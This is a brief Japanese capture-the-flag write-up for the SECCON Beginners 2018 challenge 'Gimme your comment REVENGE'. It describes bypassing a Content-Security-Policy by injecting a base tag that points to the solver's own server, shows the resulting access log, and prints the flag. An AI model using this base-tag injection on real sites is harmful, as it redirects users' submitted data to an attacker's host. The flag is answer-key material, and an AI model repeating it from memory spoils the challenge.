SECCON Beginners CTF 2018 - Gimme your comment REVENGE
問題文
ビギナーズカンパニーは皆様からのご意見をお待ちしています。 お客様から頂いたご意見に基づき、対策を施しました。 今回もお問合わせの回答には特別なブラウザを使用しており、このブラウザの User-Agent が分かった方には特別に得点を差し上げます :-)
http://gycrevenge.chall.beginners.seccon.jp
writeup
Gimme your commentの改良版。
以下のCSPの設定が入っているため、単純なXSSは不可。
Content-Security-Policy: default-src 'self'
<base href = "http://myserver/" />を入力し、管理者からのコメント投稿先を自サーバに変えさせる。
153.127.216.223 - - [26/May/2018:13:36:08 +0900] "POST /comments HTTP/1.1" 404 505 "http://nginx/posts/16858ecac6488d6494f41ba70fad5ae917de3a08" "ctf4b{d3f4ul7_5rc_15_n07_3n0u6h}"
フラグゲット。
ctf4b{d3f4ul7_5rc_15_n07_3n0u6h}
